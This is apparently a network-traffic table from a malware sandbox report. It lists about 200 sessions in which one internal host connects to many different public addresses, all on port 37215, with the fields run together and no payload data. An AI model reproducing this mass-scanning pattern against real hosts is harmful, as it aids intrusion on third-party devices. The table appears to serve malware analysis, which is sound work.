                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29204192.168.2.1541990197.229.131.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29205192.168.2.1537760197.168.87.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29206192.168.2.1547480197.45.156.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29207192.168.2.1535170197.105.16.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29208192.168.2.1559580197.96.14.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29209192.168.2.1540264197.230.47.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29210192.168.2.1543788197.129.95.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29211192.168.2.1557948197.102.50.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29212192.168.2.1555542197.25.245.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29213192.168.2.1554432197.31.139.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29214192.168.2.1540984197.216.176.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29215192.168.2.1533660197.252.92.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29216192.168.2.1551276197.22.250.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29217192.168.2.1549718197.239.231.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29218192.168.2.1545522197.66.12.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29219192.168.2.1539412197.222.167.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29220192.168.2.1546620197.60.52.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29221192.168.2.1552160197.224.221.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29222192.168.2.1539696197.247.4.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29223192.168.2.1543562197.40.227.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29224192.168.2.1560818197.71.239.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29225192.168.2.1548212197.4.208.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29226192.168.2.1547726197.110.249.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29227192.168.2.1556726197.24.96.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29228192.168.2.1544284197.54.20.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29229192.168.2.1542768197.54.233.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29230192.168.2.1547600197.88.94.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29231192.168.2.1556140197.195.135.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29232192.168.2.1537430197.87.5.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29233192.168.2.1532768197.134.86.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29234192.168.2.1552432197.56.15.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29235192.168.2.1538900197.135.37.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29236192.168.2.1543224197.40.185.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29237192.168.2.1545320197.213.18.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29238192.168.2.1547284197.38.45.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29239192.168.2.1558666197.92.91.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29240192.168.2.1544338197.174.119.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29241192.168.2.1535008197.26.71.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29242192.168.2.1548914197.68.172.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29243192.168.2.1536852197.183.159.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29244192.168.2.1538316197.194.77.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29245192.168.2.1534722197.126.43.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29246192.168.2.1552026197.208.133.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29247192.168.2.1546220197.82.91.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29248192.168.2.1557110197.157.255.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29249192.168.2.1536144197.203.36.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29250192.168.2.1534286197.222.176.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29251192.168.2.1553658197.133.24.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29252192.168.2.1543954197.185.8.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29253192.168.2.1533458197.184.83.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29254192.168.2.1535006197.44.128.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29255192.168.2.1543876197.149.83.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29256192.168.2.1536394197.153.226.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29257192.168.2.1557954197.46.159.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29258192.168.2.1554438197.131.149.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29259192.168.2.1554278197.74.194.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29260192.168.2.1551110197.168.53.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29261192.168.2.1548044197.19.83.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29262192.168.2.1536790197.208.189.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29263192.168.2.1532860197.149.122.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29264192.168.2.1540138197.192.184.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29265192.168.2.1557676197.92.247.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29266192.168.2.1534258197.142.87.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29267192.168.2.1533530197.89.119.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29268192.168.2.1558612197.72.14.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29269192.168.2.1541108197.30.35.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29270192.168.2.1547396197.104.174.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29271192.168.2.1543086197.3.22.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29272192.168.2.1552740197.92.57.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29273192.168.2.1549156197.112.152.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29274192.168.2.1537168197.177.94.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29275192.168.2.1548960197.205.169.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29276192.168.2.1542020197.202.75.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29277192.168.2.1544260197.49.226.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29278192.168.2.1546982197.172.14.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29279192.168.2.1541166197.122.55.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29280192.168.2.1542664197.230.152.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29281192.168.2.1546644197.242.53.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29282192.168.2.1536550197.160.140.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29283192.168.2.1552870197.34.152.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29284192.168.2.1555992197.5.174.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29285192.168.2.1548112197.95.163.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29286192.168.2.1539528197.69.197.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29287192.168.2.1552784197.197.1.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29288192.168.2.1541592197.116.199.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29289192.168.2.1551872197.144.208.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29290192.168.2.1560216197.104.221.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29291192.168.2.1536208197.107.178.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29292192.168.2.1558120197.122.34.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29293192.168.2.1554030197.214.190.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29294192.168.2.1542922197.90.221.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29295192.168.2.1539252197.12.71.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29296192.168.2.1548058197.46.0.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29297192.168.2.1548302156.241.197.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29298192.168.2.1546446156.132.68.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29299192.168.2.1534210156.153.204.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29300192.168.2.1559448156.175.244.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29301192.168.2.1556538156.101.147.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29302192.168.2.1549128156.14.178.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29303192.168.2.1539302156.145.157.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29304192.168.2.1558750156.56.54.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29305192.168.2.1533706156.151.50.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29306192.168.2.1552632156.134.181.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29307192.168.2.1549902156.133.187.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29308192.168.2.1558070156.220.69.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29309192.168.2.1540748156.164.64.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29310192.168.2.1548754156.153.144.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29311192.168.2.1534298156.235.164.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29312192.168.2.1533244156.27.16.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29313192.168.2.1551188156.208.129.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29314192.168.2.1552626156.30.133.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29315192.168.2.1544394156.168.176.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29316192.168.2.1536692156.229.15.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29317192.168.2.1539890156.63.231.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29318192.168.2.1559474156.136.74.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29319192.168.2.1544010156.51.210.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29320192.168.2.1560218156.189.147.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29321192.168.2.1558662156.161.246.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29322192.168.2.1544784156.107.98.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29323192.168.2.1542406156.24.167.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29324192.168.2.1547966156.143.117.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29325192.168.2.1544340156.121.129.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29326192.168.2.1540220156.35.180.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29327192.168.2.1534766156.254.213.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29328192.168.2.1545546156.236.181.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29329192.168.2.1536586156.106.163.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29330192.168.2.1542910156.121.148.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29331192.168.2.1556926156.175.87.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29332192.168.2.1551820156.19.52.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29333192.168.2.1548780156.174.108.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29334192.168.2.1556786156.61.234.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29335192.168.2.1543096156.14.132.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29336192.168.2.1541710156.13.170.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29337192.168.2.1543306156.44.46.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29338192.168.2.1550258156.40.63.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29339192.168.2.1542544156.196.203.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29340192.168.2.1552878156.67.73.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29341192.168.2.1550040156.102.93.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29342192.168.2.1552864156.13.139.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29343192.168.2.1556566156.216.107.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29344192.168.2.1546258156.26.31.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29345192.168.2.1545404156.116.16.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29346192.168.2.1537508156.33.122.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29347192.168.2.1556896156.59.95.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29348192.168.2.1559418156.135.129.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29349192.168.2.1551760156.211.113.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29350192.168.2.1555238156.216.225.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29351192.168.2.1537600156.88.89.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29352192.168.2.1545430156.77.207.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29353192.168.2.1545940156.235.109.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29354192.168.2.1551814156.181.140.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29355192.168.2.1555438156.88.207.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29356192.168.2.1557234156.125.19.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29357192.168.2.1558842156.225.225.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29358192.168.2.1533092156.214.116.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29359192.168.2.1552140156.0.244.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29360192.168.2.1551456156.192.4.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29361192.168.2.1546132156.166.192.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29362192.168.2.1560164156.103.20.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29363192.168.2.1560336156.206.150.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29364192.168.2.1539896156.248.252.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29365192.168.2.1553084156.164.151.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29366192.168.2.1545472156.4.174.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29367192.168.2.1543792156.171.145.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29368192.168.2.1552982156.137.255.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29369192.168.2.1542308156.87.83.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29370192.168.2.1545984156.207.21.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29371192.168.2.1543394156.203.127.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29372192.168.2.1549658156.75.227.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29373192.168.2.1557966156.83.139.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29374192.168.2.1552472156.60.17.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29375192.168.2.1556068156.171.166.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29376192.168.2.1555704156.138.147.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29377192.168.2.1533288156.146.142.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29378192.168.2.1547020156.46.197.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29379192.168.2.1544194156.81.0.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29380192.168.2.1553858156.198.99.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29381192.168.2.1550858156.222.180.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29382192.168.2.1550734156.110.162.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29383192.168.2.1534678156.208.142.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29384192.168.2.1549894156.24.11.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29385192.168.2.1556188156.219.63.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29386192.168.2.1559956156.118.142.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29387192.168.2.1551776156.102.59.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29388192.168.2.1539868156.208.206.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29389192.168.2.1547460156.206.81.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29390192.168.2.1535612156.91.123.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29391192.168.2.1551170156.208.162.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29392192.168.2.1548268156.90.0.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29393192.168.2.1536224156.100.209.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29394192.168.2.1557548156.67.10.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29395192.168.2.1554260156.124.137.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29396192.168.2.1556090156.96.236.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29397192.168.2.1555982156.53.26.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29398192.168.2.1550032156.70.196.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29399192.168.2.1547496156.202.100.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29400192.168.2.1549034156.176.0.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29401192.168.2.1554068156.89.32.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29402192.168.2.1556022156.195.205.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29403192.168.2.1543268156.162.129.2437215
